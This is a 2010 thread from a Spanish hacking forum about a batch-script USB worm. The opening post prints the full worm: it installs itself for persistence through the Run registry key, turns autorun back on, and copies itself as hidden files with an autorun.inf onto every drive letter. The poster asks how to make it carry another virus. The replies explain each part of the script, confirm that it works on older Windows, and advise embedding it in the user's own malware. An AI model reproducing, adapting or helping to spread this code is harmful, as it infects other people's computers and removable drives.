elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Duda con propagacion por usb
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Duda con propagacion por usb  (Leído 2,783 veces)
SockMon

Desconectado Desconectado

Mensajes: 29


Ver Perfil
Duda con propagacion por usb
« en: 5 Septiembre 2010, 19:20 pm »

Bueno buscando por internet encontre este batch de DracoX pero me surgen varias dudas.
Código
  1. @echo off
  2. reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v USB-Auto /d %windir%\USB-Auto\USB.bat /f
  3. reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom /v AutoRun /t REG_DWORD /d 1 /f
  4. reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v allocatecdroms /d 0 /f
  5. reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDriveTypeAutoRun /f
  6. reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDriveTypeAutoRun /f
  7. reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDriveAutoRun /f
  8.  
  9. if exist %windir%\USB-Auto\ Del /f /s /q %windir%\USB-Auto\
  10. md %windir%\USB-Auto\
  11. pushd %windir%\USB-Auto\
  12. copy %0 USB.bat
  13.  
  14. echo [autorun]>>autorun.inf
  15. echo open=USB.bat>>autorun.inf
  16. echo icon=icon.ico>>autorun.inf
  17. echo label=Infected>>autorun.inf
  18.  
  19. for %%x in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do copy /Y autorun.inf %%x:\autorun.inf && copy %0 %%x:\USB.bat && copy /Y %0 %%x:\icon.ico && attrib +R +S +H %%x:\icon.ico && attrib +R +S +H %%x:\USB.bat && attrib +R +S +H %%x:\autorun.inf

Esto lo unico que haria seria copiarse a si mismo guardarse en el pc y copiarse automaticamente en cualquier usb que se conecte no?

Por que realiza algunas acciones con el registro?

Como lo tendria que modificar para que tambien propagara un virus ejemplo mibixo.exe?

Por ultimo hace falta crearle un autorun para que se ejecute cuando se abra la unidad?

Gracias


En línea

leogtz
. . .. ... ..... ........ ............. .....................
Colaborador
***
Desconectado Desconectado

Mensajes: 3.069


/^$/


Ver Perfil WWW
Re: Duda con propagacion por usb
« Respuesta #1 en: 5 Septiembre 2010, 19:29 pm »

Lo primero es, ¿para qué haces esto?

Y el código agrega (reg add) un archivo bat al inicio de Windows, para que siempre se ejecute.

Habilita el autorun.

Borra algunas claves del registro que tienen que ver con el Autorun.

Código:
if exist %windir%\USB-Auto\ Del /f /s /q %windir%\USB-Auto\
md %windir%\USB-Auto\
pushd %windir%\USB-Auto\
copy %0 USB.bat

Copia el bat a la carpeta de Windows.

Código:
echo [autorun]>>autorun.inf
echo open=USB.bat>>autorun.inf
echo icon=icon.ico>>autorun.inf
echo label=Infected>>autorun.inf

Crea el autorun.

Código:
[code]for %%x in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do copy /Y autorun.inf %%x:\autorun.inf && copy %0 %%x:\USB.bat && copy /Y %0 %%x:\icon.ico && attrib +R +S +H %%x:\icon.ico && attrib +R +S +H %%x:\USB.bat && attrib +R +S +H %%x:\autorun.inf
[/code]

Propagación.

Necesitas estudiar un poco más para saber qué hace este código.


En línea

Código
  1. (( 1 / 0 )) &> /dev/null || {
  2. echo -e "stderrrrrrrrrrrrrrrrrrr";
  3. }
  4.  
http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com
[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.513

El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: Duda con propagacion por usb
« Respuesta #2 en: 5 Septiembre 2010, 19:29 pm »

1) Si eso es lo que hace, funciona en versiones de XP o inferior, debido a la UAC.
2) Se añade al registro y borra algunas cosas para habilitar el autorun.
3) Agregalo dentro del codigo de tu bixo, es mas estetico que tener que usar un batch.
4) Si, aunque hay otros metodos.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Solucionado] Duda sobre propagación de gusanos 2014 « 1 2 »
Análisis y Diseño de Malware
HA6C 13 7,406 Último mensaje 19 Mayo 2014, 21:01 pm
por softer2
Propagación de virus C (Duda)
Análisis y Diseño de Malware
Grado 33 3 3,229 Último mensaje 9 Julio 2015, 05:35 am
por engel lex
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines